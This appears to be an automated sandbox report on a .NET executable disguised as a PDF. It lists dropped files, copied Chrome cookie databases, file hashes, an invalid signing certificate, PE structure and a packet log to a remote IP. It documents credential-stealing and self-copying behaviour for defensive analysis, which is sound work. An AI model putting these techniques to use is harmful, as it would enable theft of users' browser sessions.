                                                    C:\Users\user\AppData\Roaming\3pg5upzt.i5q\Chrome\Default\Cookies
                                                    Process:C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exe
                                                    File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                    Category:modified
                                                    Size (bytes):20480
                                                    Entropy (8bit):0.7006690334145785
                                                    Encrypted:false
                                                    SSDEEP:24:TLbJLbXaFpEO5bNmISHn06UwcQPx5fBoe9H6pf1H1oNQ:T5LLOpEO5J/Kn7U1uBobfvoNQ
                                                    MD5:A7FE10DA330AD03BF22DC9AC76BBB3E4
                                                    SHA1:1805CB7A2208BAEFF71DCB3FE32DB0CC935CF803
                                                    SHA-256:8D6B84A96429B5C672838BF431A47EC59655E561EBFBB4E63B46351D10A7AAD8
                                                    SHA-512:1DBE27AED6E1E98E9F82AC1F5B774ACB6F3A773BEB17B66C2FB7B89D12AC87A6D5B716EF844678A5417F30EE8855224A8686A135876AB4C0561B3C6059E635C7
                                                    Malicious:false
                                                    Preview: SQLite format 3......@ ..........................................................................C....... ..g... .8....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    C:\Users\user\AppData\Roaming\NewApp\NewApp.exe
                                                    Process:C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exe
                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                    Category:dropped
                                                    Size (bytes):20616
                                                    Entropy (8bit):6.63827426459457
                                                    Encrypted:false
                                                    SSDEEP:384:Mhwp6WjOxO7CLlbMq/JYogNGqQsKNAdAfpniHRlhFk:gSSbhxJFqtPAfpniHbh6
                                                    MD5:5AF8F94A752CA9996FBFBF01DCC30EDD
                                                    SHA1:B52D9BA9B7890E2B51E64AB889805CFCE5126EBB
                                                    SHA-256:B37D450B7D60FD2497AE794E9835B999339549406B1A05D92BB46A9F1A23EB12
                                                    SHA-512:69D91B22E3718AFA7CE31EEA7C474EA6E8862C114186C832CF0BB9C8E1CCE19B17275D01DC025DA9D98E58A08265E6BF22F8084A010C06B840C4AD123FC1375C
                                                    Malicious:true
                                                    Antivirus:
                                                    • Antivirus: ReversingLabs, Detection: 13%
                                                    Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....F...............0..0...........N... ...`....@.. ...............................y....@.................................<N..O....`...............8............................................................... ............... ..H............text........ ...0.................. ..`.rsrc........`.......2..............@..@.reloc...............6..............@..B................pN......H........'...&...........................................................*".(.....*~s.........s.........s.........*B.(.......(.....*.0............(......(......(.....s......(......~....o..........%.r...pr...p~-...o!...(.....o.......+F+...&.........o...........,%..(......(......(.......(.....o.........X....i2..(...........%..o.......+...*..0...........s.....*.0..M..............%.r...pri..p~-...o!....%.rm..pr...p~-...o!.....s.....+...'.....o.....*....0............(.....r...pr..
                                                    C:\Users\user\AppData\Roaming\NewApp\NewApp.exe:Zone.Identifier
                                                    Process:C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exe
                                                    File Type:ASCII text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):26
                                                    Entropy (8bit):3.95006375643621
                                                    Encrypted:false
                                                    SSDEEP:3:ggPYV:rPYV
                                                    MD5:187F488E27DB4AF347237FE461A079AD
                                                    SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                    SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                    SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                    Malicious:true
                                                    Preview: [ZoneTransfer]....ZoneId=0
                                                    C:\Users\user\AppData\Roaming\aldkfvcd.2z0\Chrome\Default\Cookies
                                                    Process:C:\Users\user\AppData\Roaming\NewApp\NewApp.exe
                                                    File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                    Category:dropped
                                                    Size (bytes):20480
                                                    Entropy (8bit):0.7006690334145785
                                                    Encrypted:false
                                                    SSDEEP:24:TLbJLbXaFpEO5bNmISHn06UwcQPx5fBoe9H6pf1H1oNQ:T5LLOpEO5J/Kn7U1uBobfvoNQ
                                                    MD5:A7FE10DA330AD03BF22DC9AC76BBB3E4
                                                    SHA1:1805CB7A2208BAEFF71DCB3FE32DB0CC935CF803
                                                    SHA-256:8D6B84A96429B5C672838BF431A47EC59655E561EBFBB4E63B46351D10A7AAD8
                                                    SHA-512:1DBE27AED6E1E98E9F82AC1F5B774ACB6F3A773BEB17B66C2FB7B89D12AC87A6D5B716EF844678A5417F30EE8855224A8686A135876AB4C0561B3C6059E635C7
                                                    Malicious:false
                                                    Preview: SQLite format 3......@ ..........................................................................C....... ..g... .8....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                    Static File Info

                                                    General

                                                    File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                    Entropy (8bit):6.63827426459457
                                                    TrID:
                                                    • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                                    • Win32 Executable (generic) a (10002005/4) 49.97%
                                                    • Generic Win/DOS Executable (2004/3) 0.01%
                                                    • DOS Executable Generic (2002/1) 0.01%
                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                    File name:A4-058000200390-10-14_REV_pdf.exe
                                                    File size:20616
                                                    MD5:5af8f94a752ca9996fbfbf01dcc30edd
                                                    SHA1:b52d9ba9b7890e2b51e64ab889805cfce5126ebb
                                                    SHA256:b37d450b7d60fd2497ae794e9835b999339549406b1a05d92bb46a9f1a23eb12
                                                    SHA512:69d91b22e3718afa7ce31eea7c474ea6e8862c114186c832cf0bb9c8e1cce19b17275d01dc025da9d98e58a08265e6bf22f8084a010c06b840c4ad123fc1375c
                                                    SSDEEP:384:Mhwp6WjOxO7CLlbMq/JYogNGqQsKNAdAfpniHRlhFk:gSSbhxJFqtPAfpniHbh6
                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....F...............0..0...........N... ...`....@.. ...............................y....@................................

                                                    File Icon

                                                    Icon Hash:00828e8e8686b000

                                                    Static PE Info

                                                    General

                                                    Entrypoint:0x404e8e
                                                    Entrypoint Section:.text
                                                    Digitally signed:true
                                                    Imagebase:0x400000
                                                    Subsystem:windows gui
                                                    Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                                    DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                    Time Stamp:0x88460DE1 [Fri Jun 13 17:14:09 2042 UTC]
                                                    TLS Callbacks:
                                                    CLR (.Net) Version:v4.0.30319
                                                    OS Version Major:4
                                                    OS Version Minor:0
                                                    File Version Major:4
                                                    File Version Minor:0
                                                    Subsystem Version Major:4
                                                    Subsystem Version Minor:0
                                                    Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                    Authenticode Signature

                                                    Signature Valid:false
                                                    Signature Issuer:C=????????????????????????????????????????, S=&#225;&#175;&#138;&#225;&#175;&#153;&#225;&#175;&#167;&#225;&#175;&#179;&#225;&#175;&#142;&#225;&#175;&#140;&#225;&#175;&#147;&#225;&#175;&#150;&#225;&#175;&#167;&#225;&#175;&#166;&#225;&#175;&#165;&#225;&#175;&#134;&#225;&#175;&#144;&#225;&#175;&#137;&#225;&#175;&#144;&#225;&#175;&#163;&#225;&#175;&#141;&#225;&#175;&#134;&#225;&#175;&#169;&#225;&#175;&#132;&#225;&#175;&#175;&#225;&#175;&#183;&#225;&#175;&#162;&#225;&#175;&#150;&#225;&#175;&#146;&#225;&#175;&#139;&#225;&#175;&#145;&#225;&#175;&#146;&#225;&#175;&#176;&#225;&#175;&#187;&#225;&#175;&#142;&#225;&#175;&#138;&#225;&#175;&#187;&#225;&#175;&#132;&#225;&#175;&#131;&#225;&#175;&#179;&#225;&#175;&#131;&#225;&#175;&#173;&#225;&#175;&#150;&#225;&#175;&#166;&#225;&#175;&#183;&#225;&#175;&#151;&#225;&#175;&#183;&#225;&#175;&#139;&#225;&#175;&#137;&#225;&#175;&#138;&#225;&#175;&#140;, L=&#233;&#158;&#134;&#233;&#158;&#147;&#233;&#158;&#146;&#233;&#158;&#177;&#233;&#158;&#189;&#233;&#158;&#184;&#233;&#158;&#154;&#233;&#158;&#148;&#233;&#158;&#155;&#233;&#158;&#172;&#233;&#158;&#145;&#233;&#158;&#166;, T=&#237;&#133;&#174;&#237;&#133;&#132;&#237;&#133;&#140;&#237;&#133;&#133;&#237;&#133;&#129;&#237;&#133;&#137;&#237;&#133;&#176;&#237;&#133;&#143;&#237;&#133;&#142;&#237;&#132;&#191;&#237;&#133;&#148;&#237;&#132;&#189;&#237;&#133;&#147;&#237;&#133;&#181;&#237;&#133;&#161;&#237;&#133;&#146;&#237;&#133;&#142;&#237;&#133;&#161;&#237;&#133;&#133;&#237;&#133;&#171;&#237;&#133;&#168;&#237;&#133;&#146;&#237;&#133;&#140;&#237;&#133;&#160;&#237;&#133;&#146;&#237;&#133;&#139;&#237;&#133;&#132;&#237;&#133;&#158;&#237;&#133;&#163;&#237;&#133;&#164;&#237;&#133;&#136;&#237;&#133;&#159;&#237;&#133;&#178;&#237;&#133;&#143;&#237;&#133;&#177;&#237;&#133;&#182;&#237;&#133;&#163;&#237;&#133;&#166;&#237;&#133;&#172;&#237;&#133;&#131;&#237;&#132;&#191;&#237;&#133;&#131;&#237;&#133;&#139;&#237;&#133;&#169;, E=???????????, OU=&#231;&#177;&#152;&#231;&#177;&#184;&#231;&#177;&#180;&#231;&#177;&#189;&#231;&#177;&#157;&#231;&#177;&#149;&#231;&#177;&#151;&#231;&#177;&#164;&#231;&#177;&#169;&#231;&#178;&#139;&#231;&#177;&#164;&#231;&#178;&#132;&#231;&#178;&#140;&#231;&#178;&#132;&#231;&#177;&#156;&#231;&#178;&#140;&#231;&#177;&#152;&#231;&#177;&#189;&#231;&#177;&#181;&#231;&#178;&#130;&#231;&#177;&#162;&#231;&#177;&#160;&#231;&#177;&#180;&#231;&#178;&#134;&#231;&#177;&#168;, O=&#235;&#158;&#169;&#235;&#158;&#189;&#235;&#158;&#185;&#235;&#158;&#166;&#235;&#158;&#175;&#235;&#158;&#185;&#235;&#158;&#133;&#235;&#158;&#176;&#235;&#158;&#137;&#235;&#158;&#143;&#235;&#158;&#183;&#235;&#158;&#174;&#235;&#158;&#177;&#235;&#158;&#187;&#235;&#158;&#171;&#235;&#158;&#133;&#235;&#158;&#184;, CN=&#236;&#176;&#159;&#236;&#176;&#168;&#236;&#176;&#179;&#236;&#176;&#180;&#236;&#176;&#145;&#236;&#176;&#183;&#236;&#176;&#182;&#236;&#176;&#180;&#236;&#176;&#159;&#236;&#176;&#142;&#236;&#176;&#153;&#236;&#176;&#151;&#236;&#176;&#169;&#236;&#176;&#178;&#236;&#176;&#175;&#236;&#176;&#153;&#236;&#176;&#147;&#236;&#176;&#145;&#236;&#176;&#172;
                                                    Signature Validation Error:A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
                                                    Error Number:-2146762487
                                                    Not Before, Not After
                                                    • 2/22/2021 10:04:11 PM 2/22/2022 10:04:11 PM
                                                    Subject Chain
                                                    • C=????????????????????????????????????????, S=&#225;&#175;&#138;&#225;&#175;&#153;&#225;&#175;&#167;&#225;&#175;&#179;&#225;&#175;&#142;&#225;&#175;&#140;&#225;&#175;&#147;&#225;&#175;&#150;&#225;&#175;&#167;&#225;&#175;&#166;&#225;&#175;&#165;&#225;&#175;&#134;&#225;&#175;&#144;&#225;&#175;&#137;&#225;&#175;&#144;&#225;&#175;&#163;&#225;&#175;&#141;&#225;&#175;&#134;&#225;&#175;&#169;&#225;&#175;&#132;&#225;&#175;&#175;&#225;&#175;&#183;&#225;&#175;&#162;&#225;&#175;&#150;&#225;&#175;&#146;&#225;&#175;&#139;&#225;&#175;&#145;&#225;&#175;&#146;&#225;&#175;&#176;&#225;&#175;&#187;&#225;&#175;&#142;&#225;&#175;&#138;&#225;&#175;&#187;&#225;&#175;&#132;&#225;&#175;&#131;&#225;&#175;&#179;&#225;&#175;&#131;&#225;&#175;&#173;&#225;&#175;&#150;&#225;&#175;&#166;&#225;&#175;&#183;&#225;&#175;&#151;&#225;&#175;&#183;&#225;&#175;&#139;&#225;&#175;&#137;&#225;&#175;&#138;&#225;&#175;&#140;, L=&#233;&#158;&#134;&#233;&#158;&#147;&#233;&#158;&#146;&#233;&#158;&#177;&#233;&#158;&#189;&#233;&#158;&#184;&#233;&#158;&#154;&#233;&#158;&#148;&#233;&#158;&#155;&#233;&#158;&#172;&#233;&#158;&#145;&#233;&#158;&#166;, T=&#237;&#133;&#174;&#237;&#133;&#132;&#237;&#133;&#140;&#237;&#133;&#133;&#237;&#133;&#129;&#237;&#133;&#137;&#237;&#133;&#176;&#237;&#133;&#143;&#237;&#133;&#142;&#237;&#132;&#191;&#237;&#133;&#148;&#237;&#132;&#189;&#237;&#133;&#147;&#237;&#133;&#181;&#237;&#133;&#161;&#237;&#133;&#146;&#237;&#133;&#142;&#237;&#133;&#161;&#237;&#133;&#133;&#237;&#133;&#171;&#237;&#133;&#168;&#237;&#133;&#146;&#237;&#133;&#140;&#237;&#133;&#160;&#237;&#133;&#146;&#237;&#133;&#139;&#237;&#133;&#132;&#237;&#133;&#158;&#237;&#133;&#163;&#237;&#133;&#164;&#237;&#133;&#136;&#237;&#133;&#159;&#237;&#133;&#178;&#237;&#133;&#143;&#237;&#133;&#177;&#237;&#133;&#182;&#237;&#133;&#163;&#237;&#133;&#166;&#237;&#133;&#172;&#237;&#133;&#131;&#237;&#132;&#191;&#237;&#133;&#131;&#237;&#133;&#139;&#237;&#133;&#169;, E=???????????, OU=&#231;&#177;&#152;&#231;&#177;&#184;&#231;&#177;&#180;&#231;&#177;&#189;&#231;&#177;&#157;&#231;&#177;&#149;&#231;&#177;&#151;&#231;&#177;&#164;&#231;&#177;&#169;&#231;&#178;&#139;&#231;&#177;&#164;&#231;&#178;&#132;&#231;&#178;&#140;&#231;&#178;&#132;&#231;&#177;&#156;&#231;&#178;&#140;&#231;&#177;&#152;&#231;&#177;&#189;&#231;&#177;&#181;&#231;&#178;&#130;&#231;&#177;&#162;&#231;&#177;&#160;&#231;&#177;&#180;&#231;&#178;&#134;&#231;&#177;&#168;, O=&#235;&#158;&#169;&#235;&#158;&#189;&#235;&#158;&#185;&#235;&#158;&#166;&#235;&#158;&#175;&#235;&#158;&#185;&#235;&#158;&#133;&#235;&#158;&#176;&#235;&#158;&#137;&#235;&#158;&#143;&#235;&#158;&#183;&#235;&#158;&#174;&#235;&#158;&#177;&#235;&#158;&#187;&#235;&#158;&#171;&#235;&#158;&#133;&#235;&#158;&#184;, CN=&#236;&#176;&#159;&#236;&#176;&#168;&#236;&#176;&#179;&#236;&#176;&#180;&#236;&#176;&#145;&#236;&#176;&#183;&#236;&#176;&#182;&#236;&#176;&#180;&#236;&#176;&#159;&#236;&#176;&#142;&#236;&#176;&#153;&#236;&#176;&#151;&#236;&#176;&#169;&#236;&#176;&#178;&#236;&#176;&#175;&#236;&#176;&#153;&#236;&#176;&#147;&#236;&#176;&#145;&#236;&#176;&#172;
                                                    Version:3
                                                    Thumbprint MD5:9F981C1542F258BA57F760B8F42201BA
                                                    Thumbprint SHA-1:9B44DB25DEE3DB49C3571B6A649C69CF2B48307D
                                                    Thumbprint SHA-256:7F1CD5F2C754597D3ED7F82B0146688256270022763BF32FA684505C11EF7A2A
                                                    Serial:00C1276E79B4388663776A454F741801A5

                                                    Entrypoint Preview

                                                    Instruction
                                                    jmp dword ptr [00402000h]
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al

                                                    Data Directories

                                                    NameVirtual AddressVirtual Size Is in Section
                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x4e3c0x4f.text
                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x60000x3e0.rsrc
                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x38000x1888
                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x80000xc.reloc
                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                    Sections

                                                    NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                    .text0x20000x2e940x3000False0.579345703125PPMN archive data6.39301885442IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                    .rsrc0x60000x3e00x400False0.4638671875data3.55157726961IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                    .reloc0x80000xc0x200False0.044921875data0.0815394123432IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                    Resources

                                                    NameRVASizeTypeLanguageCountry
                                                    RT_VERSION0x60580x388dataEnglishUnited States

                                                    Imports

                                                    DLLImport
                                                    mscoree.dll_CorExeMain

                                                    Version Infos

                                                    DescriptionData
                                                    LegalCopyrightCopyright 2022 MMluWNXR. All rights reserved.
                                                    Assembly Version8.3.0.1
                                                    InternalNameIGtzbNIQ.exe
                                                    FileVersion8.3.2.1
                                                    CompanyNameJKJPfHWc
                                                    LegalTrademarksXFJPuaSO
                                                    CommentsPAljSTEY
                                                    ProductNameIGtzbNIQ
                                                    ProductVersion8.3.0.1
                                                    FileDescriptionJDbwXxui
                                                    OriginalFilenameIGtzbNIQ.exe
                                                    Translation0x0409 0x0514

                                                    Possible Origin

                                                    Language of compilation systemCountry where language is spokenMap
                                                    EnglishUnited States

                                                    Network Behavior

                                                    Network Port Distribution

                                                    TCP Packets

                                                    TimestampSource PortDest PortSource IPDest IP
                                                    Feb 23, 2021 09:46:49.547159910 CET4973480192.168.2.4104.21.71.230
                                                    Feb 23, 2021 09:46:49.600218058 CET8049734104.21.71.230192.168.2.4
                                                    Feb 23, 2021 09:46:49.600352049 CET4973480192.168.2.4104.21.71.230
                                                    Feb 23, 2021 09:46:49.601401091 CET4973480192.168.2.4104.21.71.230
                                                    Feb 23, 2021 09:46:49.654299974 CET8049734104.21.71.230192.168.2.4
                                                    Feb 23, 2021 09:46:49.687654018 CET8049734104.21.71.230192.168.2.4
                                                    Feb 23, 2021 09:46:49.687699080 CET8049734104.21.71.230192.168.2.4
                                                    Feb 23, 2021 09:46:49.687726974 CET8049734104.21.71.230192.168.2.4
                                                    Feb 23, 2021 09:46:49.687747002 CET8049734104.21.71.230192.168.2.4
                                                    Feb 23, 2021 09:46:49.687817097 CET4973480192.168.2.4104.21.71.230
                                                    Feb 23, 2021 09:46:49.688225985 CET8049734104.21.71.230192.168.2.4
                                                    Feb 23, 2021 09:46:49.688261032 CET8049734104.21.71.230192.168.2.4
                                                    Feb 23, 2021 09:46:49.688283920 CET8049734104.21.71.230192.168.2.4
                                                    Feb 23, 2021 09:46:49.688308954 CET8049734104.21.71.230192.168.2.4
                                                    Feb 23, 2021 09:46:49.688333988 CET8049734104.21.71.230192.168.2.4
                                                    Feb 23, 2021 09:46:49.688355923 CET8049734104.21.71.230192.168.2.4
                                                    Feb 23, 2021 09:46:49.688360929 CET4973480192.168.2.4104.21.71.230
                                                    Feb 23, 2021 09:46:49.688412905 CET4973480192.168.2.4104.21.71.230
                                                    Feb 23, 2021 09:46:49.689474106 CET8049734104.21.71.230192.168.2.4
                                                    Feb 23, 2021 09:46:49.689511061 CET8049734104.21.71.230192.168.2.4
                                                    Feb 23, 2021 09:46:49.689579010 CET4973480192.168.2.4104.21.71.230
                                                    Feb 23, 2021 09:46:49.690706968 CET8049734104.21.71.230192.168.2.4
                                                    Feb 23, 2021 09:46:49.690741062 CET8049734104.21.71.230192.168.2.4
                                                    Feb 23, 2021 09:46:49.690807104 CET4973480192.168.2.4104.21.71.230
                                                    Feb 23, 2021 09:46:49.691931963 CET8049734104.21.71.230192.168.2.4
                                                    Feb 23, 2021 09:46:49.691966057 CET8049734104.21.71.230192.168.2.4
                                                    Feb 23, 2021 09:46:49.692207098 CET4973480192.168.2.4104.21.71.230
                                                    Feb 23, 2021 09:46:49.693195105 CET8049734104.21.71.230192.168.2.4
                                                    Feb 23, 2021 09:46:49.693232059 CET8049734104.21.71.230192.168.2.4
                                                    Feb 23, 2021 09:46:49.693456888 CET4973480192.168.2.4104.21.71.230
                                                    Feb 23, 2021 09:46:49.694432974 CET8049734104.21.71.230192.168.2.4
                                                    Feb 23, 2021 09:46:49.694464922 CET8049734104.21.71.230192.168.2.4
                                                    Feb 23, 2021 09:46:49.694533110 CET4973480192.168.2.4104.21.71.230
                                                    Feb 23, 2021 09:46:49.695667028 CET8049734104.21.71.230192.168.2.4
                                                    Feb 23, 2021 09:46:49.695698977 CET8049734104.21.71.230192.168.2.4
                                                    Feb 23, 2021 09:46:49.696310043 CET4973480192.168.2.4104.21.71.230
                                                    Feb 23, 2021 09:46:49.696885109 CET8049734104.21.71.230192.168.2.4
                                                    Feb 23, 2021 09:46:49.696917057 CET8049734104.21.71.230192.168.2.4
                                                    Feb 23, 2021 09:46:49.696983099 CET4973480192.168.2.4104.21.71.230
                                                    Feb 23, 2021 09:46:49.698121071 CET8049734104.21.71.230192.168.2.4
                                                    Feb 23, 2021 09:46:49.698153973 CET8049734104.21.71.230192.168.2.4
                                                    Feb 23, 2021 09:46:49.698218107 CET4973480192.168.2.4104.21.71.230
                                                    Feb 23, 2021 09:46:49.699824095 CET8049734104.21.71.230192.168.2.4
                                                    Feb 23, 2021 09:46:49.699856043 CET8049734104.21.71.230192.168.2.4
                                                    Feb 23, 2021 09:46:49.699943066 CET4973480192.168.2.4104.21.71.230
                                                    Feb 23, 2021 09:46:49.700620890 CET8049734104.21.71.230192.168.2.4
                                                    Feb 23, 2021 09:46:49.700655937 CET8049734104.21.71.230192.168.2.4
                                                    Feb 23, 2021 09:46:49.700696945 CET4973480192.168.2.4104.21.71.230
                                                    Feb 23, 2021 09:46:49.740746975 CET8049734104.21.71.230192.168.2.4
                                                    Feb 23, 2021 09:46:49.740792036 CET8049734104.21.71.230192.168.2.4
                                                    Feb 23, 2021 09:46:49.740860939 CET4973480192.168.2.4104.21.71.230
                                                    Feb 23, 2021 09:46:49.741241932 CET8049734104.21.71.230192.168.2.4
                                                    Feb 23, 2021 09:46:49.741271973 CET8049734104.21.71.230192.168.2.4
                                                    Feb 23, 2021 09:46:49.741323948 CET4973480192.168.2.4104.21.71.230
                                                    Feb 23, 2021 09:46:49.742525101 CET8049734104.21.71.230192.168.2.4
                                                    Feb 23, 2021 09:46:49.742561102 CET8049734104.21.71.230192.168.2.4
                                                    Feb 23, 2021 09:46:49.742611885 CET4973480192.168.2.4104.21.71.230
                                                    Feb 23, 2021 09:46:49.743724108 CET8049734104.21.71.230192.168.2.4
                                                    Feb 23, 2021 09:46:49.743783951 CET8049734104.21.71.230192.168.2.4
                                                    Feb 23, 2021 09:46:49.743841887 CET4973480192.168.2.4104.21.71.230
                                                    Feb 23, 2021 09:46:49.744987011 CET8049734104.21.71.230192.168.2.4
                                                    Feb 23, 2021 09:46:49.745585918 CET8049734104.21.71.230192.168.2.4
                                                    Feb 23, 2021 09:46:49.745621920 CET8049734104.21.71.230192.168.2.4
                                                    Feb 23, 2021 09:46:49.745641947 CET4973480192.168.2.4104.21.71.230
                                                    Feb 23, 2021 09:46:49.746828079 CET8049734104.21.71.230192.168.2.4
                                                    Feb 23, 2021 09:46:49.746870995 CET8049734104.21.71.230192.168.2.4
                                                    Feb 23, 2021 09:46:49.746906996 CET4973480192.168.2.4104.21.71.230
                                                    Feb 23, 2021 09:46:49.748076916 CET8049734104.21.71.230192.168.2.4
                                                    Feb 23, 2021 09:46:49.748135090 CET8049734104.21.71.230192.168.2.4
                                                    Feb 23, 2021 09:46:49.748147964 CET4973480192.168.2.4104.21.71.230
                                                    Feb 23, 2021 09:46:49.749310970 CET8049734104.21.71.230192.168.2.4
                                                    Feb 23, 2021 09:46:49.749347925 CET8049734104.21.71.230192.168.2.4
                                                    Feb 23, 2021 09:46:49.749372005 CET4973480192.168.2.4104.21.71.230
                                                    Feb 23, 2021 09:46:49.750562906 CET8049734104.21.71.230192.168.2.4
                                                    Feb 23, 2021 09:46:49.750601053 CET8049734104.21.71.230192.168.2.4
                                                    Feb 23, 2021 09:46:49.750631094 CET4973480192.168.2.4104.21.71.230
                                                    Feb 23, 2021 09:46:49.751826048 CET8049734104.21.71.230192.168.2.4
                                                    Feb 23, 2021 09:46:49.751856089 CET8049734104.21.71.230192.168.2.4
                                                    Feb 23, 2021 09:46:49.751888990 CET4973480192.168.2.4104.21.71.230
                                                    Feb 23, 2021 09:46:49.753025055 CET8049734104.21.71.230192.168.2.4
                                                    Feb 23, 2021 09:46:49.753053904 CET8049734104.21.71.230192.168.2.4
                                                    Feb 23, 2021 09:46:49.753082991 CET4973480192.168.2.4104.21.71.230
                                                    Feb 23, 2021 09:46:49.754278898 CET8049734104.21.71.230192.168.2.4
                                                    Feb 23, 2021 09:46:49.754313946 CET8049734104.21.71.230192.168.2.4
                                                    Feb 23, 2021 09:46:49.754328012 CET4973480192.168.2.4104.21.71.230
                                                    Feb 23, 2021 09:46:49.755542994 CET8049734104.21.71.230192.168.2.4
                                                    Feb 23, 2021 09:46:49.755600929 CET8049734104.21.71.230192.168.2.4
                                                    Feb 23, 2021 09:46:49.755606890 CET4973480192.168.2.4104.21.71.230
                                                    Feb 23, 2021 09:46:49.756756067 CET8049734104.21.71.230192.168.2.4
                                                    Feb 23, 2021 09:46:49.756793022 CET8049734104.21.71.230192.168.2.4
                                                    Feb 23, 2021 09:46:49.756820917 CET4973480192.168.2.4104.21.71.230
                                                    Feb 23, 2021 09:46:49.758002996 CET8049734104.21.71.230192.168.2.4
